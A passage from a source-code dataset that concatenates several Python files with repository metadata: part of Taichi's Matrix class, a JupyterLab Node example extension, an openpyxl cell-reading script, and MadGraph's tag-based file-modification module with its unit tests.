ret = self.empty_copy()
for i in range(len(ret.entries)):
ret.entries[i] = self.entries[i].grad
return ret
def sum(self):
ret = self.entries[0]
for i in range(1, len(self.entries)):
ret = ret + self.entries[i]
return ret
@kern_mod.pyfunc
def norm(self, eps=0):
return ops_mod.sqrt(self.norm_sqr() + eps)
@kern_mod.pyfunc
def norm_inv(self, eps=0):
return ops_mod.rsqrt(self.norm_sqr() + eps)
@kern_mod.pyfunc
def norm_sqr(self):
return (self**2).sum()
@kern_mod.pyfunc
def max(self):
return ops_mod.ti_max(*self.entries)
@kern_mod.pyfunc
def min(self):
return ops_mod.ti_min(*self.entries)
def any(self):
import taichi as ti
ret = ti.cmp_ne(self.entries[0], 0)
for i in range(1, len(self.entries)):
ret = ret + ti.cmp_ne(self.entries[i], 0)
return -ti.cmp_lt(ret, 0)
def all(self):
import taichi as ti
ret = ti.cmp_ne(self.entries[0], 0)
for i in range(1, len(self.entries)):
ret = ret + ti.cmp_ne(self.entries[i], 0)
return -ti.cmp_eq(ret, -len(self.entries))
def fill(self, val):
if impl.inside_kernel():
def assign_renamed(x, y):
import taichi as ti
return ti.assign(x, y)
return self.element_wise_writeback_binary(assign_renamed, val)
if isinstance(val, numbers.Number):
val = tuple(
[tuple([val for _ in range(self.m)]) for _ in range(self.n)])
elif isinstance(val,
(list, tuple)) and isinstance(val[0], numbers.Number):
assert self.m == 1
val = tuple([(v, ) for v in val])
if isinstance(val, Matrix):
val_tuple = []
for i in range(val.n):
row = []
for j in range(val.m):
row.append(val.get_entry(i, j))
row = tuple(row)
val_tuple.append(row)
val = tuple(val_tuple)
assert len(val) == self.n
assert len(val[0]) == self.m
from .meta import fill_matrix
fill_matrix(self, val)
@python_scope
def to_numpy(self, keep_dims=False, as_vector=None, dtype=None):
# Discussion: https://github.com/taichi-dev/taichi/pull/1046#issuecomment-633548858
if as_vector is not None:
warning(
'v.to_numpy(as_vector=True) is deprecated, '
'please use v.to_numpy() directly instead',
DeprecationWarning,
stacklevel=3)
as_vector = self.m == 1 and not keep_dims
shape_ext = (self.n, ) if as_vector else (self.n, self.m)
if not self.is_global():
return np.array(self.entries).reshape(shape_ext)
if dtype is None:
dtype = to_numpy_type(self.dtype)
ret = np.zeros(self.shape + shape_ext, dtype=dtype)
from .meta import matrix_to_ext_arr
matrix_to_ext_arr(self, ret, as_vector)
return ret
@python_scope
def to_torch(self, device=None, keep_dims=False):
import torch
as_vector = self.m == 1 and not keep_dims
shape_ext = (self.n, ) if as_vector else (self.n, self.m)
ret = torch.empty(self.shape + shape_ext,
dtype=to_pytorch_type(self.dtype),
device=device)
from .meta import matrix_to_ext_arr
matrix_to_ext_arr(self, ret, as_vector)
import taichi as ti
ti.sync()
return ret
@python_scope
def from_numpy(self, ndarray):
if len(ndarray.shape) == len(self.loop_range().shape) + 1:
as_vector = True
assert self.m == 1, "This matrix is not a vector"
else:
as_vector = False
assert len(ndarray.shape) == len(self.loop_range().shape) + 2
dim_ext = 1 if as_vector else 2
assert len(ndarray.shape) == len(self.loop_range().shape) + dim_ext
from .meta import ext_arr_to_matrix
ext_arr_to_matrix(ndarray, self, as_vector)
import taichi as ti
ti.sync()
@python_scope
def from_torch(self, torch_tensor):
return self.from_numpy(torch_tensor.contiguous())
@python_scope
def copy_from(self, other):
assert isinstance(other, Matrix)
from .meta import tensor_to_tensor
assert len(self.shape) == len(other.shape)
tensor_to_tensor(self, other)
@taichi_scope
def __ti_repr__(self):
yield '['
for i in range(self.n):
if i:
yield ', '
if self.m != 1:
yield '['
for j in range(self.m):
if j:
yield ', '
yield self(i, j)
if self.m != 1:
yield ']'
yield ']'
def __str__(self):
"""Python scope matrix print support."""
if impl.inside_kernel():
'''
It seems that when pybind11 got an type mismatch, it will try
to invoke `repr` to show the object... e.g.:
TypeError: make_const_expr_f32(): incompatible function arguments. The following argument types are supported:
1. (arg0: float) -> taichi_core.Expr
Invoked with: <Taichi 2x1 Matrix>
So we have to make it happy with a dummy string...
'''
return f'<{self.n}x{self.m} ti.Matrix>'
else:
return str(self.to_numpy())
def __repr__(self):
if self.is_global():
# make interactive shell happy, prevent materialization
return f'<{self.n}x{self.m} ti.Matrix.field>'
else:
return str(self.to_numpy())
@staticmethod
@taichi_scope
def zero(dt, n, m=1):
import taichi as ti
return Matrix([[ti.cast(0, dt) for _ in range(m)] for _ in range(n)])
@staticmethod
@taichi_scope
def one(dt, n, m=1):
import taichi as ti
return Matrix([[ti.cast(1, dt) for _ in range(m)] for _ in range(n)])
@staticmethod
@taichi_scope
def unit(n, i, dt=None):
import taichi as ti
if dt is None:
dt = int
assert 0 <= i < n
return Matrix([ti.cast(int(j == i), dt) for j in range(n)])
@staticmethod
@taichi_scope
def identity(dt, n):
import taichi as ti
return Matrix([[ti.cast(int(i == j), dt) for j in range(n)]
for i in range(n)])
@staticmethod
def rotation2d(alpha):
import taichi as ti
return Matrix([[ti.cos(alpha), -ti.sin(alpha)],
[ti.sin(alpha), ti.cos(alpha)]])
@classmethod
@python_scope
def field(cls,
n,
m,
dtype,
shape=None,
offset=None,
needs_grad=False,
layout=None): # TODO(archibate): deprecate layout
'''ti.Matrix.field'''
self = cls.empty(n, m)
self.entries = []
self.n = n
self.m = m
self.dt = dtype
if isinstance(dtype, (list, tuple, np.ndarray)):
# set different dtype for each element in Matrix
# see #2135
if m == 1:
assert len(np.shape(dtype)) == 1 and len(
dtype
) == n, f'Please set correct dtype list for Vector. The shape of dtype list should be ({n}, ) instead of {np.shape(dtype)}'
for i in range(n):
self.entries.append(impl.field(dtype[i]))
else:
assert len(np.shape(dtype)) == 2 and len(dtype) == n and len(
dtype[0]
) == m, f'Please set correct dtype list for Matrix. The shape of dtype list should be ({n}, {m}) instead of {np.shape(dtype)}'
for i in range(n):
for j in range(m):
self.entries.append(impl.field(dtype[i][j]))
else:
for _ in range(n * m):
self.entries.append(impl.field(dtype))
self.grad = self.make_grad()
if layout is not None:
assert shape is not None, 'layout is useless without shape'
if shape is None:
assert offset is None, "shape cannot be None when offset is being set"
if shape is not None:
if isinstance(shape, numbers.Number):
shape = (shape, )
if isinstance(offset, numbers.Number):
offset = (offset, )
if offset is not None:
assert len(shape) == len(
offset
), f'The dimensionality of shape and offset must be the same ({len(shape)} != {len(offset)})'
import taichi as ti
if layout is None:
layout = ti.AOS
dim = len(shape)
if layout.soa:
for i, e in enumerate(self.entries):
ti.root.dense(ti.index_nd(dim), shape).place(e,
offset=offset)
if needs_grad:
ti.root.dense(ti.index_nd(dim),
shape).place(e.grad, offset=offset)
else:
var_list = []
for i, e in enumerate(self.entries):
var_list.append(e)
if needs_grad:
for i, e in enumerate(self.entries):
var_list.append(e.grad)
ti.root.dense(ti.index_nd(dim), shape).place(*tuple(var_list),
offset=offset)
return self
@classmethod
@python_scope
@deprecated('ti.Matrix.var', 'ti.Matrix.field')
def var(cls, n, m, dt, *args, **kwargs):
'''ti.Matrix.var'''
_taichi_skip_traceback = 1
return cls.field(n, m, dt, *args, **kwargs)
@classmethod
def _Vector_field(cls, n, dtype, *args, **kwargs):
'''ti.Vector.field'''
_taichi_skip_traceback = 1
return cls.field(n, 1, dtype, *args, **kwargs)
@classmethod
@deprecated('ti.Vector.var', 'ti.Vector.field')
def _Vector_var(cls, n, dt, *args, **kwargs):
'''ti.Vector.var'''
_taichi_skip_traceback = 1
return cls._Vector_field(n, dt, *args, **kwargs)
@staticmethod
def rows(rows):
mat = Matrix()
mat.n = len(rows)
if isinstance(rows[0], Matrix):
for row in rows:
assert row.m == 1, "Inputs must be vectors, i.e. m == 1"
assert row.n == rows[
0].n, "Input vectors must share the same shape"
mat.m = rows[0].n
# l-value copy:
mat.entries = [row(i) for row in rows for i in range(row.n)]
elif isinstance(rows[0], list):
for row in rows:
assert len(row) == len(
rows[0]), "Input lists share the same shape"
mat.m = len(rows[0])
# l-value copy:
mat.entries = [x for row in rows for x in row]
else:
raise Exception(
"Cols/rows must be a list of lists, or a list of vectors")
return mat
@staticmethod
def cols(cols):
return Matrix.rows(cols).transpose()
@classmethod
def empty(cls, n, m):
return cls([[None] * m for _ in range(n)])
@classmethod
def new(cls, n, m):
if impl.inside_kernel():
return cls(n, m)
else:
return cls.empty(n, m)
def __hash__(self):
# TODO: refactor KernelTemplateMapper
# If not, we get `unhashable type: Matrix` when
# using matrices as template arguments.
return id(self)
@kern_mod.pyfunc
def dot(self, other):
impl.static(
impl.static_assert(self.m == 1, "lhs for dot is not a vector"))
impl.static(
impl.static_assert(other.m == 1, "rhs for dot is not a vector"))
return (self * other).sum()
@kern_mod.pyfunc
def _cross3d(self, other):
ret = Matrix([
self[1] * other[2] - self[2] * other[1],
self[2] * other[0] - self[0] * other[2],
self[0] * other[1] - self[1] * other[0],
])
return ret
@kern_mod.pyfunc
def _cross2d(self, other):
ret = self[0] * other[1] - self[1] * other[0]
return ret
def cross(self, other):
if self.n == 3 and self.m == 1 and other.n == 3 and other.m == 1:
return self._cross3d(other)
elif self.n == 2 and self.m == 1 and other.n == 2 and other.m == 1:
return self._cross2d(other)
else:
raise ValueError(
"Cross product is only supported between pairs of 2D/3D vectors"
)
@kern_mod.pyfunc
def outer_product(self, other):
impl.static(
impl.static_assert(self.m == 1,
"lhs for outer_product is not a vector"))
impl.static(
impl.static_assert(other.m == 1,
"rhs for outer_product is not a vector"))
ret = Matrix([[self[i] * other[j] for j in range(other.n)]
for i in range(self.n)])
return ret
# TODO: deprecate ad-hoc use ti.Matrix() as global (#1500:2.2/2)
def Vector(n, dt=None, shape=None, offset=None, **kwargs):
return Matrix(n, 1, dt=dt, shape=shape, offset=offset, **kwargs)
Vector.var = Matrix._Vector_var
Vector.field = Matrix._Vector_field
Vector.zero = Matrix.zero
Vector.one = Matrix.one
Vector.dot = Matrix.dot
Vector.cross = Matrix.cross
Vector.outer_product = Matrix.outer_product
Vector.unit = Matrix.unit
Vector.normalized = Matrix.normalized
| 34.166994 | 142 | 0.505951 |
79547904c009f3f7a09b0624a0758552e9366bd2 | 1,102 | py | Python | packages/services/examples/node/main.py | xjc90s/jupyterlab | 82df0b635dae2c1a70a7c41fe7ee7af1c1caefb2 | [
"BSD-3-Clause"
] | null | null | null | packages/services/examples/node/main.py | xjc90s/jupyterlab | 82df0b635dae2c1a70a7c41fe7ee7af1c1caefb2 | [
"BSD-3-Clause"
] | 8 | 2022-01-04T19:19:07.000Z | 2022-03-03T22:11:12.000Z | packages/services/examples/node/main.py | xjc90s/jupyterlab | 82df0b635dae2c1a70a7c41fe7ee7af1c1caefb2 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import absolute_import, print_function
import json
import os.path as osp
from jupyterlab_server.process import which
from jupyterlab_server.process_app import ProcessApp
HERE = osp.dirname(osp.realpath(__file__))
def _jupyter_server_extension_points():
return [{"module": __name__, "app": NodeApp}]
class NodeApp(ProcessApp):
name = __name__
serverapp_config = dict(allow_origin="*")
def get_command(self):
"""Get the command and kwargs to run."""
# Run the node script with command arguments.
config = dict(
baseUrl="http://localhost:{}{}".format(self.serverapp.port, self.settings["base_url"]),
token=self.settings["token"],
)
with open(osp.join(HERE, "config.json"), "w") as fid:
json.dump(config, fid)
cmd = [which("node"), "index.js", "--jupyter-config-data=./config.json"]
return cmd, dict(cwd=HERE)
if __name__ == "__main__":
NodeApp.launch_instance()
| 26.878049 | 99 | 0.671506 |
79547994d102841a4ca227cc1b5815c6c8076e27 | 310 | py | Python | BizPy/openpyxl/20200212/read_all_cells.py | t2y/python-study | 52a132ea600d4696164e540d8a8f8f5fc58e097a | [
"Apache-2.0"
] | 18 | 2016-08-15T00:24:44.000Z | 2020-11-30T15:11:52.000Z | BizPy/openpyxl/20200212/read_all_cells.py | t2y/python-study | 52a132ea600d4696164e540d8a8f8f5fc58e097a | [
"Apache-2.0"
] | null | null | null | BizPy/openpyxl/20200212/read_all_cells.py | t2y/python-study | 52a132ea600d4696164e540d8a8f8f5fc58e097a | [
"Apache-2.0"
] | 6 | 2016-09-28T10:47:03.000Z | 2020-10-14T10:20:06.000Z | import sys
from openpyxl import load_workbook
filename = sys.argv[1]
wb = load_workbook(filename, read_only=True)
print(f'{filename} のワークシート情報を読み込みます')
ws0 = wb.worksheets[0]
print(f'{ws0.title} のセルを1行ずつ表示します')
for row in ws0:
values = [str(column.value) for column in row]
print(values)
| 23.846154 | 51 | 0.712903 |
795479e3a5ed99ebc20af2487244637d0535963a | 44,848 | py | Python | madgraph/madweight/mod_file.py | valassi/mg5amc_test | 2e04f23353051f64e1604b23105fe3faabd32869 | [
"NCSA"
] | 1 | 2016-07-09T00:05:56.000Z | 2016-07-09T00:05:56.000Z | madgraph/madweight/mod_file.py | valassi/mg5amc_test | 2e04f23353051f64e1604b23105fe3faabd32869 | [
"NCSA"
] | 4 | 2022-03-10T09:13:31.000Z | 2022-03-30T16:15:01.000Z | madgraph/madweight/mod_file.py | valassi/mg5amc_test | 2e04f23353051f64e1604b23105fe3faabd32869 | [
"NCSA"
] | 1 | 2016-07-09T00:06:15.000Z | 2016-07-09T00:06:15.000Z | #!/usr/bin/env python
####################################################################################################
####################################################################################################
## ##
## MOD FILE MODULE ##
## ##
####################################################################################################
####################################################################################################
## ##
## Author: Mattelaer Olivier ##
## Institution: UCL-CP3 ##
## contact: omattelaer@uclouvain.be ##
## ##
## last modification: 01/06/10 ##
## tag release: 1.4 ##
## ##
####################################################################################################
## ##
## MANUAL ##
## ##
####################################################################################################
## ##
## This module is dedicated to modified file in planified way. The file must have tag in order ##
## to perform the needed modifications. All tag are in the following syntax: ##
## $B$ NAME $B$ -> begin of a block to modify with RULE=NAME ##
## $E$ NAME $E$ -> end of the block to modify with RULE=NAME ##
## $B$ NAME $E$ -> replace tag by RULE=NAME ##
## Some character are reserved: ##
## 'S-','_' and '+' ##
## 'S-': indicates a special tag (see later). Don't start name with this two caracter ##
## '_' : indicates begin of option in special tag, use freely if you are not in this case ##
## '+' : for splitting different option value (use freely elsewhere) ##
## ##
## This is the special expression authorized in NAME (all start with S-) ##
## ##
## S-END:(only in rule) add the text in end (no tag needed) ##
## S-DEl:(in mod_file) supress this part of the file ##
## S-COMMENT_?: start commenting the defined region. ##
## The comment tag will be the value in place of the '?'. the '?' Can not contain '+' or '_' ##
## S-DECOMMENT_?:(only in rule) inverse the comment procedure apply with S-COMMENT (go back to ##
## original line) ##
## S-REGEX_exp+new[+opt]: regular expression to move an expression to another. ##
## "exp": a Python regular expression for the text to modify ##
## "new": the new expression to write ##
## "opt": python option for regular option (the one in re.compile) ##
## if this rule appear in rule file, the modification appear in the complete file. ##
## no '_' or '+' are autorized in "exp" or "new". those one can be echap with '\' ##
## ##
## Priority order ##
## if a step define a tag that will in a future step the modification on the tag will be done ##
## if you want to prevent this create the tag with $B-DIFF$ and with $E-DIFF$ ##
## ##
## 1) we first apply the global REGEXP ##
## 2) we apply decomment module ##
## 3) we apply the modification for $B$ NAME $E$ ##
## 4) we apply the modification for $B$ NAME $B$ TEXT $E$ NAME $E$ ##
## 5) we convert the $ ?-DIFF$ in normal tag ##
## ##
####################################################################################################
## ##
## Exemple of use: ##
## 1) with a master file ##
## ##
## import mod_file ##
## ##
## mod_file.mod_file(./master_file.txt) ##
## ##
## 2) without master file ##
## ##
## import mod_file ##
## ##
## mod_file.mod_file(file_to_change,rule,[write='']) ##
## file_to_change: can be string or list of file ##
## rule: position of the rule-file. You can also use a list of rule files (this must have ##
## the same length than file_to_change list ##
## ##
####################################################################################################
## ##
## master file ##
## is a file with tree column corresponding to mod_file/rule_file/write the write is ##
## not optional in file. Comment start with # in this file ##
## ##
## rule file ##
## in this file, you can defined, what are the new text to for each tag. Syntax is: ##
## $B$ NAME $B$ ##
## CONTENT ##
## $E$ NAME $E$ ##
## ##
####################################################################################################
## ##
## modification list: ##
## ##
## 01/06/10: - make the modification inside a unknow blok ##
## - add a test suite for MadWeight case ##
## ##
## 29/09/09: - differentiate $b$...$b$ from $B$...$B$ (gestion of end of line) ##
## ##
## 22/05/09: - add decomment option ##
## - ensure that all end of line use tag \n ##
## ##
## 11/11/08: - modify documentation ##
## - authorize differate affectation with B-DIFF ##
## ##
## 31/01/08: - pass in object ##
## - add S-comment super tag ##
## - add S-del super tag ##
## - pass in isolated module ##
## - create documentation ##
## - replace tag can be inserted in a line ##
## ##
## 23/06/08: - add S-REGEXP super tag ##
## - add function list ##
## - differentiate $B$...$E$ with $b$...$e$ ##
## the first supress the full tag line ##
## ##
####################################################################################################
## ##
## Function ##
## -------- ##
## ##
## mod_file ##
## mod_text ##
## Mod_file ##
## | + init ##
## | + mod_all_file ##
## | | + mod_one_file ##
## | | + mod_one_text ##
## | | + + treat_begin_end_line ##
## | + extract_modif ##
## | + return_mod_text ##
## | | + comment_text ##
## | | + del_text ##
## | | + regexp_text ##
## | + back_to_init_dir ##
## | + go_to_main_dir ##
## ##
####################################################################################################
# Module
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
import re
import shutil
import string
from time import time
from six.moves import range
# 1 ###############################################################
def mod_file(mod_file,rule_file='',write='',opt={}):
if rule_file: #not a master asking
if type(mod_file)!=list:
mod_obj=Mod_file(opt=opt)
mod_obj.mod_one_file(mod_file,rule_file,write)
elif type(mod_file)==list:
#supress problem of output
if write=='':
write=['']*len(mod_file)
#supress problem if only one rule_file
if type(rule_file)!=list:
rule_file=[rule_file]*len(mod_file)
if type(rule_file)==str:
mod_obj=Mod_file(rule_file=rule_file,opt=opt)
for i in range(0,len(mod_file)):
mod_obj.mod_one_file(mod_file[i],mod_obj.dico,write[i])
else:
mod_obj=Mod_file(opt=opt)
for i in range(0,len(mod_file)):
mod_obj.mod_one_file(mod_file[i],rule_file[i],write[i])
else:
mod_obj=Mod_file(mod_file,opt=opt)
# 1 ###############################################################
def mod_text(text,rule_file='',write=''):
mod_obj=Mod_file()
mod_obj.file='input text'
text=mod_obj.mod_one_text(text,rule_file,write)
return text
# 1 ###############################################################
class Mod_file:
nowarning=[]
# 2 ###############################################################
def __init__(self,main_file='',rule_file='',opt={}):
""" start the instruction of modification present in the main file if present """
self.d_init=os.getcwd()
self.d_rule=os.getcwd()
self.d_main=os.getcwd()
self.failed=0 #tag to know if a tag is not modify
if opt:
for key,value in opt.items():
exec('self.'+key+'='+str(value)+'')
if main_file:
#main_dir is the directory of the main_file
self.d_rule=os.path.dirname(os.path.realpath(main_file))
self.d_main=self.d_rule
self.mod_all_file(os.path.basename(main_file))
if rule_file:
self.extract_modif(rule_file)
# 2 ###############################################################
def mod_all_file(self,rule_pos):
""" apply modification following manager main_file """
self.go_to_main_dir()
#pattern for tree column in a line
opt_pattern=re.compile(r'''^\s*(?P<opt>\S+)\s*=\s*(?P<value>\S+)''')
Pattern=re.compile(r'''^\s*(?P<file>\S+)\s+(?P<rule>\S+)\s+(?P<write>\S*)\s*$''')
ff=open(rule_pos,'r')
while 1:
line=ff.readline()
if line=='':
break
if line[0]=='#':
continue
obj_opt=opt_pattern.search(line)
if obj_opt:
if obj_opt.group('opt')=='main_dir':
self.d_main=os.path.join(self.d_main,obj_opt.group('value'))
self.go_to_main_dir()
obj_pat=Pattern.search(line)
if obj_pat:
self.mod_one_file(obj_pat.group('file'),obj_pat.group('rule'),obj_pat.group('write'))
self.back_to_init_dir()
# 3 ###############################################################
def mod_one_file(self,mod_file,rule_file,write=''):
""" modify the file mod_file with rule_file instruction output will ba place in write (same file by default)"""
start=time()
self.go_to_main_dir()
self.file=mod_file
ff=open(mod_file,'r')
text=ff.read()
ff.close()
if write:
self.mod_one_text(text,rule_file,write)
else:
self.mod_one_text(text,rule_file,mod_file)
self.back_to_init_dir()
stop=time()
#print 'time used to modifiy file:',stop-start,'s'
return
# 3 ###############################################################
def mod_one_text(self,text,rule_file='',write=''):
""" modify the text with rule_file instruction output will be place in write (same file by default)"""
self.go_to_main_dir()
#print "modify ",mod_file.split('/')[-1]
if rule_file=='':
dico=self.dico
elif type(rule_file)!=dict:
self.extract_modif(rule_file)
else:
dico=rule_file
self.dico=dico
# print "dico", self.dico.keys()
begin_end=re.compile(r'''\$(?P<maj>B)\$\s?(?P<tag>\S+)\s?\$B\$(?P<text>.*)\$E\$\s?(?P=tag)\s?\$E\$''',re.S+re.I) # $B$ TAG $B$ TEXT $E$ TAG $E$
end_file=re.compile(r'''\$\$\s*END\s+FILE\s*\$\$''') # $$ END FILE $$
replace=re.compile(r'''\$(?P<maj>B)\$[ \t]*(?P<tag>\S+)[ \t]*\$E\$''',re.I) # $B$ TAG $E$
end_begin=re.compile(r'''\$(?P<maj>E)\$\s?(?P<tag>\S+)\s?\$E\$(?P<text>.*)\$B\$\s?(?P=tag)\s?\$B\$''',re.S+re.I) # $E$ TAG $E$ TEXT $B$ TAG $B$ -> in case of multiple tag
##treat global regexp
for key in self.dico.keys():
if key.startswith('S-REGEXP'):
text=self.return_mod_text(key,text)
##treat decomment module
for key in self.dico.keys():
if key.startswith('S-DECOMMENT_'):
text=self.return_mod_text(key,text)
##treat replacment
text_list=replace.split(text)
text_to_write=text_list.pop(0)
while len(text_list)>1:
maj=text_list.pop(0).isupper()
tag=text_list.pop(0)
text_to_write2=self.return_mod_text(tag,'')
text_to_write3=text_list.pop(0)
text_to_write=self.treat_begin_end_line(maj,text_to_write,text_to_write2,text_to_write3)
##treat block part
text_list=begin_end.split(text_to_write)
text_to_write=text_list.pop(0)
multiple=0 #control
while len(text_list)>2:
maj=text_list.pop(0).isupper()
tag=text_list.pop(0)
text=text_list.pop(0)
if end_begin.search(text) and end_begin.search(text).group('tag')==tag:
mod_text=self.treat_multiple_tag(text,maj,tag)
else:
mod_text=self.return_mod_text(tag,text)
text_next=text_list.pop(0)
text_to_write=self.treat_begin_end_line(maj,text_to_write,mod_text,text_next)
## treat end file:
if "S-END" in self.dico:
if not end_file.search(text_to_write):
text_to_write+=self.dico["S-END"]
## restore diff affectation
text_to_write=text_to_write.replace('$B-DIFF$','$B$')
text_to_write=text_to_write.replace('$E-DIFF$','$E$')
##check that only one type of end of line is in use
text_to_write=text_to_write.replace('\r\n','\n')
##write output
if write:
ff=open(write,'w')
ff.writelines(text_to_write)
ff.close()
self.back_to_init_dir()
return text_to_write
# 4 #########################################################################
def treat_begin_end_line(self,clearline,text_before,text,text_after):
if clearline and not self.failed:
output=text_to_write=text_before[:text_before.rfind('\n')]+'\n'
output+=text
output+='\n'+text_after[text_after.find('\n'):]
else:
output=text_before+text+text_after
self.failed=0
return output
# 4 #########################################################################
def treat_multiple_tag(self,text,maj,tag):
end_begin=re.compile(r'''\$E\$\s?(?P<tag>\S+)\s?\$E\$(?P<text>.*)\$(?P<maj>B)\$\s?(?P=tag)\s?\$B\$''',re.S+re.I) # $E$ TAG $E$ TEXT $B$ TAG $B$ -> in case of multiple tag
split_text=end_begin.split(text)
text1=split_text.pop(0)
tag=split_text.pop(0)
mod_text=self.return_mod_text(tag,text1)
text_next=split_text.pop(0)
text_next=self.mod_one_text(text_next)
text_to_write=self.treat_begin_end_line(maj,'',mod_text,text_next)
maj=split_text.pop(0)
text2=split_text.pop(0)
mod_text=self.return_mod_text(tag,text2)
text_to_write=self.treat_begin_end_line(maj,text_to_write,mod_text,'')
return text_to_write
#############################################################################
# Extract rule information #
#############################################################################
# 2 ###############################################################
def extract_modif(self,rule_file):
"""put the information in a dictionary"""
try:
ff=open(rule_file,'r')
except:
ff=open(os.path.join(self.d_rule,rule_file),'r')
begin=re.compile(r'''^\$B\$\s?(?P<tag>\S+)\s?\$B\$''')
end=re.compile(r'''^\$E\$\s?(?P<tag>\S+)\s?\$E\$''')
comment=re.compile(r'''^##\**\s*$''')
special_begin=re.compile(r'''^\$(?P<tag>S-\S+)-B\$''')
special_end=re.compile(r'''^\$(?P<tag>S-\S+)-E\$''')
special=re.compile(r'''^\$(?P<tag>S-\S+)\$''')
self.dico={}
tag=""
replace_text=""
rec_mode=0
while 1:
line=ff.readline()
if line=='':
break
if comment.search(line):
continue
if special.search(line):
tag=special.search(line).group('tag')
self.dico[tag]=''
if begin.search(line) or special_begin.search(line):
try:
tag=begin.search(line).group('tag')
except:
tag=special_begin.search(line).group('tag')
if rec_mode:
print('error in ',rule_file,' wrong termination for ',tag,' rule')
sys.exit()
rec_mode=1
continue
if end.search(line) or special_end.search(line):
try:
tag=end.search(line).group('tag')
except:
tag=special_end.search(line).group('tag')
if rec_mode==0:
print('error in ',rule_file,'no initial tag:', tag)
sys.exit()
#detect one-line replacment => supress blank and '\n'
if replace_text.count('\n')==1:
replace_text=replace_text[:-1]
while replace_text.endswith(' '):
replace_text=replace_text[:-1]
self.dico[tag]=replace_text
tag=""
replace_text=""
rec_mode=0
continue
if rec_mode:
replace_text+=line
if rec_mode:
print('error in ',rule_file,' wrong end-file termination ')
sys.exit()
return self.dico
#############################################################################
# tag treatment #
#############################################################################
# 2 ###############################################################
def return_mod_text(self,tag,text):
""" by default return the text linked to tag
special tag are S-TAG_OPT: OPT=OPT1+OPT2+OPT3+..."""
special_tag=re.compile(r'''S-(?P<tag>[^ \t\n\r\f\v_]+)_?(?P<opt>[^\t\n\r\f\v]*)''') # S-TAG_OPT
if not special_tag.search(tag):
try:
return self.dico[tag]
except:
if tag not in self.nowarning and self.nowarning != 'all':
print('WARNING: tag:',tag,' not defined in file ',self.file)
print('no modification done for this tag')
if text:
output = '$B$ '+tag+' $B$'+ self.mod_one_text(text)+' $E$ '+tag+' $E$'
else:
output = '$B$ '+tag+' $E$'
self.failed=1
return output
#SPECIAL TAG CASE
short_tag=special_tag.search(tag).group('tag')
opt=special_tag.search(tag).group('opt').split('+')
#be sure that some split are not with a echap tag
old=''
opt2=[]
for part in opt:
if len(part) and part[-1]=='\\' :
old=part[:-1]+'+'
else:
opt2.append(old+part)
old=''
opt=opt2
tag=short_tag.lower()
if tag=='comment':
text=self.comment_text(text,opt[0])
elif tag=='del':
text=self.del_text(text)
elif tag=='regexp':
if len(opt)==2:
text=self.regexp_text(text,opt[0],opt[1])
elif len(opt)==3:
text=self.regexp_text(text,opt[0],opt[1],opt[2])
elif tag=='decomment':
text=self.decomment_text(text,opt[0])
return text
# 3 ###############################################################
def comment_text(self,text,comment_tag):
""" add comment_tag before each line """
end_line=re.compile(r''' ''')
#print [text]
#print [text.split('\n')]
#print text
#print text.replace('\n','\n'+comment_tag+'\t')
text=comment_tag+'|\t'+text.replace('\n','\n'+comment_tag+'|\t')
if text[-3:]=="|\t\n":
text=text[-3:]
text=text.replace('\t',' ')
text2=''
for line in text.split('\n'):
if line=='':
continue
if len(line)<74:
if line[-1]=='\n':
line=line[:-1]
for i in range(len(line),73):
line+=' '
line+='|\n'
else:
line+='\n'
text2+=line
line=comment_tag+'+'+71*'-'+'+\n'
return line+text2+line+'\n'
# 3 ###############################################################
def decomment_text(self,text,comment_tag):
""" remove comment inserted by comment_text """
carac_line=re.compile(comment_tag+'\+'+71*'-'+'\+')
def decomment_line(line,comment_tag):
if line[:6]==comment_tag+'| ':
line=line[6:]
else:
print([line[:6]])
print('failed decomment')
if line[-1]=='|':
line=line[:-1]
return line
decomment=0
init_text=text.split('\n')
end_text=''
for line in init_text:
if carac_line.search(line):
decomment=not decomment
if decomment:
end_text+=comment_tag+' $B-DIFF$ S-COMMENT_'+comment_tag+' $B-DIFF$\n'
continue
else:
end_text+=comment_tag+' $E-DIFF$ S-COMMENT_'+comment_tag+' $E-DIFF$\n'
continue
if decomment:
# end_text+=line+'\n'
end_text+=decomment_line(line,comment_tag)+'\n'
else:
end_text+=line+'\n'
return end_text
return end_text
# 3 ###############################################################
def del_text(self,text):
return ''
# 3 ###############################################################
def regexp_text(self,text,exp,new,opt=''):
""" replace the text exp (python regular expression) with new"""
### step A) remove escape '_' and '+'
### step B) apply the modification
### step C) return new text
## Step A: remove escape '_' and '+'
exp=exp.replace('\\\\','@888@') #stupid security against string like (\\_)
exp=exp.replace('\_','_').replace('\+','+')
exp=exp.replace('@888@','\\\\') #end of the trick
# Step B: apply the modification
pattern=re.compile(exp,eval(opt))
text=pattern.sub(new, text)
# Step C: return
return text
############################################################################
# positioning routine #
############################################################################
# 2 ###############################################################
def back_to_init_dir(self):
os.chdir(self.d_init)
# 2 ###############################################################
def go_to_main_dir(self):
os.chdir(self.d_main)
#########################################################################################################
# TEST #################################################################################################
#########################################################################################################
if '__main__' == __name__:
import sys
sys.path.append('./Source/MadWeight/Python')
from . import create_run
import unittest
import os, shutil
class TestMod_file(unittest.TestCase):
""" Test the the mod routines works correctly on MadWeight """
def setUp(self):
""" create a copy of the original file """
shutil.copyfile('../Template/SubProcesses/cuts.f', './SubProcesses/cuts.bk')
def tearDown(self):
os.system('rm -f ./SubProcesses/cuts.mod')
os.system('rm -f ./SubProcesses/cuts.bk')
os.system('rm -f ./SubProcesses/cuts.o')
def test_cuts(self):
""" test if we can activate/desactivate the cuts """
self.assertEqual(create_run.cut_is_active('cuts.bk'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.bk'),1)
file_to_mod='./SubProcesses/cuts.bk'
rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
#modify file
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
file_to_mod='./SubProcesses/cuts.mod'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
